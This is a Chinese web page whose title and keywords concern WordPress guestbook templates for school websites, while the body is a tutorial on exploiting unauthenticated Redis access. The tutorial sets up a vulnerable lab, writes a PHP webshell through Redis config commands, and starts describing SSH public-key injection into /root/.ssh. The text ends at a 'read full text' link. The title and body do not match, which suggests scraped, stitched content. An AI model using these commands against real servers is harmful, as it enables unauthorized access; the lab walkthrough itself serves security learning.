如何获取学校网站的WordPress留言板模板?

摘要:学校建网站,wordpress留言板模板下载,网站建设营销策略,做静态网站需要什么Redis简介 Redis是C语言开发的一个开源高性能(key-value)键值对类型的内存NoS
学校建网站,wordpress留言板模板下载,网站建设营销策略,做静态网站需要什么Redis简介 Redis是C语言开发的一个开源高性能#xff08;key-value#xff09;键值对类型的内存NoSQL数据库#xff0c;可以用作数据库、缓存、信息中间件(性能非常优秀#xff0c;支持持久化到硬盘且高可用)。由于其自身特点#xff0c;可以广泛应用在数据集群#xff…Redis简介 Redis是C语言开发的一个开源高性能key-value键值对类型的内存NoSQL数据库可以用作数据库、缓存、信息中间件(性能非常优秀支持持久化到硬盘且高可用)。由于其自身特点可以广泛应用在数据集群分布式队列信息中间件等网络架构中在内网渗透的突破中常常扮演getshell的角色。 关于redis未授权访问漏洞 Redis安装后默认情况下会绑定在 0.0.0.0:6379如果没有进行采用相关的策略比如添加防火墙规则避免其他非信任来源 ip 访问等等会导致 Redis 服务暴露在公网上如果在没有设置密码认证默认为空的情况下会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 攻击者在未授权访问 Redis 的情况下利用 Redis 自身的提供的 config 命令可以进行写文件操作攻击者还可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件的 authotrized_keys 文件中进而可以使用对应私钥直接使用ssh服务器登录目标服务器。 Redis在3.2.0之后增加了一个保护模式默认还是无密码但是限制了只有本地(回环接口)才能访问但是由于无密码校验还是经常被利用如ssrf权限提升等等。 漏洞的产生条件有以下两点: Redis绑定在0.0.0.0:6379且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略直接暴露在公网。 没有设置密码认证默认为空或者弱密码可以登录redis服务。 漏洞影响版本 Redis 2.x3.x4.x5.x Redis环境搭建 这里是在ubuntu上搭建的 下载Redis源码 wget http://download.redis.io/releases/redis-3.2.11.tar.gz解压压缩包 tar xzf redis-3.2.11.tar.gz进入安装目录编译执行 cd redis-3.2.11 make出现这个就代表编译成功了如果编译出现问题可以看看 gcc 环境是否安装。 拷贝 ​​redis-server​​ 和​​ redis-cli​​ 拷贝到​​/usr/bin​​目录 cd src cp redis-server /usr/bin/ cp redis-cli /usr/bin/将​​redis.conf​​拷贝到​​/etc/​​目录下 cp redis.conf /etc/编辑​​/etc/redis.conf​​文件 vim /etc/redis.conf在该行前面增加​​#​​注释ip绑定允许除本地外的主机远程登录redis服务 关闭保护模式将​​yes​​改为​​no​​允许远程连接redis服务 使用修改过后的配置文件启动​​Redis​​服务 redis-server /etc/redis.conf接着使用另一台机器无账号登录redis 写入webshell 利用条件 目标开启了web服务并且知道web路径。root权限执行的redis具有读写权限。 假设已知 web 路径代码如下 config set dir /var/www/html/ config set dbfilename shell.php set webshell ?php phpinfo();? save去靶机看一下可以看到已经写入了。 注意 在写入webshell的时候可以使用​​\r\n​​来换行因为保存下来的文件是数据库备份为快照文件所以存在一定格式(脏数据)可能导致无法解析。 set shell \r\n\r\n?php phpinfo();?\r\n\r\n写入SSH 免密登录 原理在数据库中插入一条数据将本机的公钥作为value或key值然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys把缓冲的数据保存在文件里这样就可以在服务器端的/root/.ssh下生一个授权的key。 这个场景主要应用在没有 web 应用的服务器redis一般都是与web分离的linux系统都存在/root目录所以这种方式会更加实用些。
阅读全文